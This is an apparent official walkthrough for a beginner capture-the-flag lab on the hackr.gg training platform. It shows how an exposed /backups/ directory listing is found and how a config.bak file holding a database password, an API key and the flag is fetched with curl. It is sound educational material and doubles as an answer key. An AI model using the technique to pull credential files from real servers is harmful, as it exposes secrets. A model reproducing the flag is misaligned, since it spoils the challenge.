HACKR.GG
hackr.gg — FileDump — Directory Listing Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

FileDump — Directory Listing

Security Misconfiguration · Security Misconfiguration
Difficulty
Beginner
Vuln class
Security Misconfiguration
Steps
2
// Objective
Find the exposed backup directory via directory listing and retrieve the flag from a backup file.
// Tools required
Browsercurlgobuster
// Step-by-step walkthrough
1
Browse to the web root
Navigate to the target URL. The server doesn't have a default index page in certain directories — check if directory listing is enabled.
Command / Input
http://TARGET/backups/
Output
Index of /backups/ backup_2024.zip db_dump.sql config.bak
Directory listing exposes every file in the directory. This should be disabled in production.
2
Download the config backup
The config.bak file likely contains credentials or sensitive data — and the flag.
Command / Input
curl http://TARGET/backups/config.bak
Output
DB_PASSWORD=sup3r_s3cr3t FLAG=HackrGG{m1sc0nf1g_d1r_l1st1ng_3xp0s3d} API_KEY=...
// Flag
Flag value
HackrGG{m1sc0nf1g_d1r_l1st1ng_3xp0s3d}
Inside config.bak in the exposed /backups/ directory.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute